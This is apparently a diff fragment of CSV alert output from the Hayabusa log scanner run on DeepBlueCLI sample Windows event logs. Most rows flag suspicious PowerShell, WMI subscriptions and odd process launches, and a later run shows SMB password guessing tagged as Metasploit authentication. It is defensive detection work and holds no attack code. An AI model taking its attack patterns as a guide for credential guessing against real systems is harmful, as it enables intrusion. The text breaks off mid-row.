-2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 18:53:55.378 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 23:10:46.008 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:45:14.660 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:45:14.661 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:45:42.333 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:46:17.504 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:46:53.627 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:47:29.168 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:48:26.011 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:48:49.187 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:49:58.603 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:51:06.219 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:51:13.833 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:51:25.086 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:51:39.538 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:52:37.050 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:53:24.700 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:53:57.790 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 01:34:31.100 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- -2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.588 
+09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.773 
+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
